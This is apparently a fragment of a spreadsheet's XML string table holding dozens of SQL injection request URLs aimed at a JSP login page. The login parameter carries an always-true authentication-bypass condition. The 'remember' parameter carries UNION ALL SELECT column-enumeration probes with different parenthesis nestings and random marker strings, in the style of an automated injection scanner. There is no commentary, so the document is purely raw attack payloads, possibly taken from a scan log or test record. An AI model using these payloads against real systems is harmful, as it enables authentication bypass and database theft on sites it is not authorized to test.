    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058,2058#and('onzm'='onzm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772#and('oece'='oece&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016,3016#and('asjg'='asjg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675#and('mofq'='mofq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111#and('eqtc'='eqtc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565#and('tgia'='tgia&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229,2229#and('yqkz'='yqkz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173#and('qbgu'='qbgu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136,2136#and('vsgl'='vsgl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528,7528#and(('wmla'='wmla&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678#and(('jbvu'='jbvu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049,7049#and(('uyow'='uyow&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490,9490#and(('jxrs'='jxrs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937,9937#and(('ggtz'='ggtz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469,9469#and(('wmqu'='wmqu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696,1696#and(('qhkx'='qhkx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813,6813#and(('zban'='zban&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548,4548#and(('utjd'='utjd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759,6759#and(('zrle'='zrle&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673,8673#and((('ejkr'='ejkr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787,787#and((('snuc'='snuc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092,2092#and((('krja'='krja&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103,1103#and((('ngfd'='ngfd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895,3895#and((('szog'='szog&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802,2802#and((('qqwg'='qqwg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464#and((('ahmx'='ahmx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466,8466#and((('onor'='onor&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900,9900#and((('jtsu'='jtsu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886,5886#and((('jlmo'='jlmo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050,8050#and'jzvx'='jzvx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487#and'rnav'='rnav&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166#and'btkp'='btkp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943,3943#and'lwkd'='lwkd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169,6169#and'hxoy'='hxoy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512,3512#and'wvth'='wvth&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996,4996#and'kmgh'='kmgh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593#and'wmkx'='wmkx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204,1204#and'anga'='anga&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719,1719#and'xgcp'='xgcp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224,2224#and('voxf'like'voxf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760,6760#and('bvvl'like'bvvl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325#and('woxo'like'woxo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593#and('ccos'like'ccos&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383#and('uuqz'like'uuqz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486#and('tglf'like'tglf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216#and('lqqy'like'lqqy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211,3211#and('ahbe'like'ahbe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097,2097#and('enxg'like'enxg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915#and('pnge'like'pnge&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996,1996#and(('talo'like'talo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122,3122#and(('zeqd'like'zeqd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093,2093#and(('yrwx'like'yrwx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569,7569#and(('bqjn'like'bqjn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700#and(('hyuh'like'hyuh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988,3988#and(('vlnu'like'vlnu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307,3307#and(('mzjv'like'mzjv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929,7929#and(('eksr'like'eksr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612,7612#and(('bvgf'like'bvgf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706,4706#and(('unbi'like'unbi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833#and((('qvli'like'qvli&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738,7738#and((('xmve'like'xmve&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191,8191#and((('skab'like'skab&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449,7449#and((('mnwq'like'mnwq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325,9325#and((('afyq'like'afyq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991,6991#and((('isds'like'isds&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447,9447#and((('zidi'like'zidi&amp;modo=entrar</t>
